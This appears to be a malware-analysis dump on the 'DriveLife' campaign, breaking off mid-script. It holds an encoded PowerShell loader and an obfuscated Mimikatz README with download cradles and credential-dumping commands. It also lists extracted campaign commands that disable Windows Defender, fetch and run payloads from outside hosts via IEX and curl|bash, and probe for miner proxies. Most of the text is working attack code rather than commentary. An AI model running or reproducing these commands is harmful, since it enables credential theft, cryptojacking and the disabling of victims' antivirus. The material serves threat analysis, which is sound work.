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
')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

--------------------------------------------------------------------------------
/DriveLife/mimikataz-ps1/README.md:
--------------------------------------------------------------------------------
### "DriveLife" mimikatz sample

```
7fe00c654df98f23409bf4416b6394d6e8af6a83c4a31ea42e0c4e82e866735d  PEBytes32.dll
ef525c47de9cceacafe796b28c09d4780a2cc49abc3f2199ae2e83bc7b4b78fa  PEBytes64.dll
fa1331aba1f68ca18f3ad8a8f6c87526e6d69ed4734312f997215660f2d50aac  README.md
e70132be487ca63d5b5d52cfa25273958526dc896c62eaf8bea041339fa8aece  mimi.dat
```

#### REFERENCE:

https://raw.githubusercontent.com/vysecurity/ps1-toolkit/master/Invoke-Mimikatz.ps1

#### VirusTotal sample link:

First Submission: 2021-03-31 11:10:21

SHA-256: e70132be487ca63d5b5d52cfa25273958526dc896c62eaf8bea041339fa8aece

https://www.virustotal.com/gui/file/e70132be487ca63d5b5d52cfa25273958526dc896c62eaf8bea041339fa8aece/community

Remote download URLs:

```cmd
http://bb3u9.com/mimi.dat?v=&r=1
http://bb3u9.com/mimi.dat?v=&r=2
http://bb3u9.com/mimi.dat?v=&r=3
```

```powershell
if-1.4.ps1:15841:$mimipath = $env:tmp+'\mimi.dat'
if-1.4.ps1:15851:            try{(new-object System.Net.WebClient).DownloadFile($down_url+"/mimi.dat?v=$VVERSION&r=$d_retry",$mimipath)}catch{}

————————————————————————————————————————————————————————————————————————————————————————————————————

$mimipath = $env:tmp+'\mimi.dat'

$d_retry=3

while(!(Test-Path $mimipath) -or (Get-Item $mimipath).length -ne 3563487){
    if($d_retry -eq 0){break}
    write-host "try to get mimi...$d_retry"
    try{(new-object System.Net.WebClient).DownloadFile($down_url+"/mimi.dat?v=$VVERSION&r=$d_retry",$mimipath)}catch{}
    $d_retry--
    start-sleep 1

}
```

### Usage:

```powershell
# Target host has internet access
powershell "IEX (New-Object Net.WebClient).DownloadString('https://www.xxx.com/mimi.dat'); Invoke-Udyeijdyqid -kkudhqydyq2"

# Target host has no internet access
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1/mimi.dat');Invoke-Udyeijdyqid -kkudhqydyq2"

# Download the file to the target host and execute it
powershell Import-Module .\mimi.dat;Invoke-Udyeijdyqid -Command '"privilege::debug" "sekurlsa::logonPasswords exit"'

# Other usage
powershell -NonInteractive Import-Module .\mimi.dat;Invoke-Udyeijdyqid -kkudhqydyq2
powershell -NonInteractive Import-Module .\mimi.dat;Invoke-Udyeijdyqid -DumpCerts
powershell -NonInteractive Import-Module .\mimi.dat;Invoke-Udyeijdyqid -Command '"privilege::debug" "sekurlsa::logonPasswords exit"'
```

The default version used is mimikatz 2.2.0:

```cmd
PS C:\temp> .\mimi.ps1;Invoke-Udyeijdyqid
S-1-5-21-2070056706-1071056509-2494751531-1000
Hostname: xxx-PC / S-1-5-21-2070056706-1071056509-2494751531

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 27 2020 13:42:38
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 629014 (00000000:00099916)
Session           : Interactive from 1
User Name         : xxx
Domain            : xxx-PC
Logon Server      : xxx-PC
Logon Time        : 2021/11/1 10:49:09
SID               : S-1-5-21-2070056706-1071056509-2494751531-1000
        msv :
         [00000003] Primary
         * Username : xxx
         * Domain   : xxx-PC
         * NTLM     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
         * SHA1     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
         [00010000] CredentialKeys
         * NTLM     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
         * SHA1     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
        tspkg :
        wdigest :
         * Username : xxx
         * Domain   : xxx-PC
         * Password : xxxxxxxxx
```

--------------------------------------------------------------------------------
/DriveLife/powershell-beautiful/domain-include.txt:
--------------------------------------------------------------------------------
1 | if-1.4.ps1:3: $ipc_cmd='cmd /c powershell -e 
UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgADEAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYwA6AFwAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUA & start /b powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(''https://t.m7n''+''0y.com/7p.php?2.0*ipc*%username%*%computername%*''+[Environment]::OSVersion.version.Major);bpu (''https://t.m7n''+''0y.com/ipc.jsp?2.0'')' 2 | if-1.4.ps1:4: $ipco_cmd='cmd /c powershell -e UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgADEAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYwA6AFwAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUA & start /b powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(''https://t.m7n''+''0y.com/7p.php?2.0*ipco*%username%*%computername%*''+[Environment]::OSVersion.version.Major);bpu (''https://t.m7n''+''0y.com/ipco.jsp?2.0'')' 3 | if-1.4.ps1:6: $mssql_cmd='cmd /c powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(''https://t.m7n''+''0y.com/ms.jsp?2.0*%computername%'')' 4 | if-1.4.ps1:7: $mssqlo_cmd='cmd /c powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IE`x(Ne`w-Obj`ect 
Net.WebC`lient).DownLoadString(''https://t.m7n''+''0y.com/mso.jsp?2.0*%computername%'')' 5 | if-1.4.ps1:12: $rdp_cmd='cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe&powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IEX(New-Object Net.WebClient).DownloadString(''https://t.m7n''+''0y.com/rdp.jsp?2.0'')' 6 | if-1.4.ps1:13: $rdpo_cmd='cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe&powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IEX(New-Object Net.WebClient).DownloadString(''https://t.m7n''+''0y.com/rdpo.jsp?2.0'')' 7 | if-1.4.ps1:14: $ssh_cmd='export src=ssh;curl -fksSL https://t.m7n0y.com/ln/core.png?ssh*2.0|bash' 8 | if-1.4.ps1:15: $ssho_cmd='export src=ssho;curl -fksSL https://t.m7n0y.com/ln/core.png?ssho*2.0|bash' 9 | if-1.4.ps1:16: $redis_cmd='export src=rds;curl -fksSL https://t.m7n0y.com/ln/core.png?rds*2.0|bash' 10 | if-1.4.ps1:17: $rediso_cmd='export src=rdso;curl -fksSL https://t.m7n0y.com/ln/core.png?rdso*2.0|bash' 11 | if-1.4.ps1:18: $smgh_cmd='cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:/windows/system32/WindowsPowerShell/v1.0/powershell.exe;Add-MpPreference -ExclusionPath c:/ & powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IEx(New-Object Net.WebClient).DownLoadString(''https://t.m7n''+''0y.com/smgh.jsp?2.0*%computername%'')' 12 | if-1.4.ps1:19: $smgho_cmd='cmd /c powershell Add-MpPreference -ExclusionProcess c:/windows/system32/WindowsPowerShell/v1.0/powershell.exe;Add-MpPreference -ExclusionPath c:/&powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IEx(New-Object Net.WebClient).DownLoadString(''https://t.m7n''+''0y.com/smgho.jsp?2.0*%computername%'')' 13 | 
if-1.4.ps1:20: $yarn_cmd='export src=yarn;curl -fksSL https://t.m7n0y.com/ln/core.png?yarn*2.0|bash' 14 | if-1.4.ps1:21: $yarno_cmd='export src=yarno;curl -fksSL https://t.m7n0y.com/ln/core.png?yarno*2.0|bash' 15 | if-1.4.ps1:22: $logic_cmd='cmd /c powershell -e UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgADEAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYwA6AFwAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUA & powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(''https://t.m7n''+''0y.com/logic.jsp?2.0*%computername%'')','export src=logic;curl -fksSL https://t.m7n0y.com/ln/core.png?logic*2.0|bash' 16 | if-1.4.ps1:23: $logico_cmd='cmd /c powershell -e UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgADEAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYwA6AFwAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUA & powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(''https://t.m7n''+''0y.com/logico.jsp?2.0*%computername%'')','export src=logico;curl -fksSL https://t.m7n0y.com/ln/core.png?logico*2.0|bash' 17 | if-1.4.ps1:24: $es_cmd='cmd /c powershell -e 
UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgADEAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYwA6AFwAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUA & powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IEx(New-Object Net.WebClient).DownLoadString(''https://t.m7n''+''0y.com/es.jsp?2.0*%computername%'')','export src=es;curl -fksSL https://t.m7n0y.com/ln/core.png?es*2.0|bash' 18 | if-1.4.ps1:25: $eso_cmd='cmd /c powershell -e UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgADEAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYwA6AFwAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUA & powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IEx(New-Object Net.WebClient).DownLoadString(''https://t.m7n''+''0y.com/eso.jsp?2.0*%computername%'')','export src=eso;curl -fksSL https://t.m7n0y.com/ln/core.png?eso*2.0|bash' 19 | if-1.4.ps1:26: $solr_cmd='cmd /c powershell -e 
UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgADEAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYwA6AFwAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUA & powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IEx(New-Object Net.WebClient).DownLoadString(''https://t.m7n''+''0y.com/solr.jsp?2.0*%computername%'')','export src=solr;curl -fksSL https://t.m7n0y.com/ln/core.png?solr*2.0|bash' 20 | if-1.4.ps1:27: $solro_cmd='cmd /c powershell -e UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgADEAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYwA6AFwAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUA & powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IEx(New-Object Net.WebClient).DownLoadString(''https://t.m7n''+''0y.com/solro.jsp?2.0*%computername%'')','export src=solro;curl -fksSL https://t.m7n0y.com/ln/core.png?solro*2.0|bash' 21 | if-1.4.ps1:28: $docker_cmd='export src=docker;curl -fksSL https://t.m7n0y.com/ln/core.png?docker*2.0|bash' 22 | if-1.4.ps1:29: $dockero_cmd='export src=dockero;curl -fksSL https://t.m7n0y.com/ln/core.png?dockero*2.0|bash' 23 | if-1.4.ps1:30: $core_url='https://t.m7n0y.com' 24 | if-1.4.ps1:33: if(!$down_url){$down_url='https://d.bb3u9.com'} 25 | kr-1.3.ps1:1:if(!$down_url){ $down_url = 'http://d.u78wjdu.com' } try{$version=$ifmd5[0..5]-join""}catch{} function isPubIP { Param( 
[parameter(Mandatory=$true)][String]$ip ) $resIps = @( @(4026531840L, 3758096384L), @(4026531840L, 4026531840L), @(4278190080L, 0L), @(4278190080L, 167772160L), @(4278190080L, 2130706432L), @(4290772992L, 1681915904L), @(4293918720L, 2886729728L), @(4294836224L, 3323068416L), @(4294901760L, 2851995648L), @(4294901760L, 3232235520L), @(4294967040L, 3221225472L), @(4294967040L, 3221225984L), @(4294967040L, 3227017984L), @(4294967040L, 3325256704L), @(4294967040L, 3405803776L), @(4294967295L, 4294967295L) ) $iparr = $ip.split(".") $iplong = 0 for($i=3;$i -ge 0; $i--){ $iplong = $iplong -bor [int]$iparr[3-$i] * [math]::pow(2,8*$i) } for($j=0;$j -lt $resIps.count;$j++){ if(($iplong -band $resIps[$j][0]) -eq $resIps[$j][1]){ return $false } } return $true } function ssl_connect($ip,$port,$send_str){ $ret = "" try{ $socket = New-Object Net.Sockets.TcpClient($ip, $port) $sslStream = New-Object System.Net.Security.SslStream($socket.GetStream(),$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback])) $sslStream.ReadTimeout = 5000 $sslStream.AuthenticateAsClient('') $writer = new-object System.IO.StreamWriter($sslStream) $reader = new-object System.IO.StreamReader($sslStream) $writer.WriteLine($send_str) $writer.flush() $ret = $reader.ReadLine() $socket.close() }catch{} return $ret } function raw_connect($ip,$port,$send_str){ try{ $client = NEW-objEcT Net.Sockets.TcpClient($ip,$port) $sock = $client.Client $bytes = [Text.Encoding]::ASCII.GetBytes($send_str) $sock.send(($bytes)) | out-null $sock.ReceiveTimeout = 5000 $res = [Array]::CreateInstance(('byte'), 10000) $recv = $sock.Receive($res) $res = $res[0..($recv-1)] $str = [Text.Encoding]::ASCII.getstring($res) return $str }catch{} return "" } function ishttp($ip,$port){ $data="GET / HTTP/1.1nn" $ret = raw_connect $ip $port $data if($ret.indexOf("HTTP/1") -ne -1){ return $true } return $false } function ishttps($ip,$port){ $data = "GET / HTTP/1.1nn" $ret = ssl_connect $ip $port $data if($ret.indexOf("HTTP/1") 
-ne -1){ return $true } return $false } function isminerproxy($ip,$port){ $data ='{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":null,"agent":"XMRig/5.13.1","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva"]}}' + "n" $ret = raw_connect $ip $port $data if($ret.indexOf("jsonrpc") -ne -1){ write-host "miner proxy!!" return $true } return $false } function isminerproxys($ip,$port){ $data = '{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":null,"agent":"XMRig/5.13.1","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva"]}}' $ret = ssl_connect $ip $port $data if($ret.indexOf("jsonrpc") -ne -1){ write-host "miner proxys!!" return $true } return $false } Add-Type -TypeDefinition 'using System;using System.Diagnostics;using System.Security.Principal;using System.Runtime.InteropServices;public static class Kernel32{[DllImport("kernel32.dll")] public static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess,out bool pbDebuggerPresent);[DllImport("kernel32.dll")] public static extern int DebugActiveProcess(int PID);[DllImport("kernel32.dll")] public static extern int DebugActiveProcessStop(int PID);}' function ProcessSuspend($id){ $procName = (Get-Process -id $id -ErrorAction SilentlyContinue).name if($procName -eq $null){ Write-Host "ERROR: There is no process with an ID of $id" return } Write-host "Attempting to suspend $procName (PID: $id)..." 
if ($id -le 0) { write-host "You didn't input a positive integer" return } $debug = whoami /priv | Where-Object{$_ -like "*SeDebugPrivilege*"} if($debug -ne $null){ $DebugPresent = [IntPtr]::Zero $out = [Kernel32]::CheckRemoteDebuggerPresent(((Get-Process -Id $id).Handle),[ref]$debugPresent) if ($debugPresent){ write-host "There is already a debugger attached to this process" return } $suspend = [Kernel32]::DebugActiveProcess($id) if ($suspend -eq $false){ write-host "ERROR: Unable to suspend $procName (PID: $id)" } else{ write-host "The $procName process (PID: $id) was successfully suspended!" } } else{ write-host "ERROR: You do not have debugging privileges to pause any process" return } } function gmd5($d){ [Security.Cryptography.MD5]::Create().ComputeHash($d)|foreach{$l+=$_.ToString('x2')} return $l } function getprotected(){ function getrname(){ function gmd5($d){ [Security.Cryptography.MD5]::Create().ComputeHash($d)|foreach{$l+=$_.ToString('x2')} return $l } $rpath="C:\Windows\System32\Windowspowershell\V1.0" $enames = gci "$rpath\*" -Include *.exe -Exclude powershell.exe|foreach{$_.name} $tmd5 = gmd5 ([IO.File]::ReadAllBytes("$rpath\powershell.exe")) foreach($ename in $enames){ $md5_=gmd5 ([IO.File]::ReadAllBytes("$rpath\$ename")) if($tmd5 -eq $md5_){ return $ename } } return "NULLNULL" } $comp_name = $env:COMPUTERNAME $guid = (get-wmiobject Win32_ComputerSystemProduct).UUID $mac = (Get-WmiObject Win32_NetworkAdapterConfiguration | where {$_.ipenabled -EQ $true}).Macaddress | select-object -first 1 $m6exe=(gmd5 ([system.Text.Encoding]::UTF8.GetBytes($comp_name+$guid+$mac))).substring(0,6) $pids=@() $pids+=Get-WmiObject -Class Win32_Process|Where-Object{$_.path -like '*m6g.bin.exe*' -or $_.path -like '*m6.bin.exe*' -or $_.path -like "*$m6exe*" -or $_.name -eq (getrname)}|foreach{$_.processid} return $pids } function sendmsg($ip,$ismproxy,$mpid){ try{ $mac = (Get-WmiObject Win32_NetworkAdapterConfiguration | where {$_.ipenabled -EQ $true}).Macaddress | 
